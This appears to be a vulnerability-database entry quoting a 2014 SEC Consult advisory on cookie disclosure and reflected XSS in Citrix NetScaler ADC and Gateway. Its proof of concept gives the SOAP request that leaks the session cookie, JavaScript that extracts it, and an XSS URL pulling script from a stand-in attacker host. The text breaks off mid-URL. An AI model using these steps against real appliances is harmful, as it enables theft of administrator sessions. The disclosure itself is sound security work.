var-201407-0464
Vulnerability from variot
Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway (formerly Access Gateway Enterprise Edition) before 9.3-62.4 and 10.x before 10.1-126.12 allows attackers to obtain sensitive information via vectors related to a cookie. Citrix NetScaler Application Delivery Controller is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20140716-2 >
title: Multiple vulnerabilities
product: Citrix NetScaler Application Delivery Controller
Citrix NetScaler Gateway
vulnerable version: <9.3-62.4 <10.1-126.12 fixed version: >=9.3-62.4 >=10.1-126.12 CVE: CVE-2014-4346, CVE-2014-4347 impact: High homepage: http://www.citrix.com found: 2014-01-05 by: Stefan Viehb\xf6ck SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================
Vendor/product description:
"Citrix NetScaler helps organizations build enterprise cloud networks that embody the characteristics and capabilities that define public cloud services, such as elasticity, expandability and simplicity. NetScaler brings to enterprise IT leaders multiple advanced technologies that were previously available only to large public cloud providers."
"As an undisputed leader of service and application delivery, Citrix NetScaler solutions are deployed in thousands of networks around the globe to optimize, secure and control the delivery of all enterprise and cloud services. They deliver 100 percent application availability, application and database server offload, acceleration and advanced attack protection. Deployed directly in front of web and database servers, NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into a single, easy-to-use platform."
URL: http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html
Business recommendation:
Attackers can exploit XSS and other vulnerabilities that lead to cookie disclosure to execute administrative actions.
Affected Systems should be updated as soon as possible.
Vulnerability overview/description:
1) Cookie disclosure The error handler in the Apache g_soap module prints all of the request header information including the HTTP Cookie field.
2) Reflected Cross-Site Scripting (XSS) Citrix Netscaler suffers from multiple reflected Cross-Site Scripting vulnerabilities, which allow an attacker to steal user information, impersonate users and perform administrative actions on the appliance.
There are many parameters which are not properly sanitized and thus vulnerable to XSS.
Proof of concept:
1) Cookie disclosure A GET request to the SOAP handler returns the following information:
GET /soap HTTP/1.1
Host:
Response: HTTP/1.1 200 OK ... Content-Type: text/html
...mod_gsoap Apache SOAP Server Error
No body received
...
Cookie: SESSID=*SESSION ID*;
...
In combination with an XSS vulnerability (see 2) an attacker can use the following
code to extract cookies including the SESSID cookie of an administrator:
var request = new XMLHttpRequest();
request.open('GET', '/soap', false);
request.send();
lines=request.responseText.split('
')
for (var i in lines){
if (lines[i].indexOf('Cookie')==0){
alert(lines[i]);
break;
}
}
2) Reflected Cross-Site Scripting
Accessing the following URL will include the Javascript code from http://evilattacker/evil.js:
http://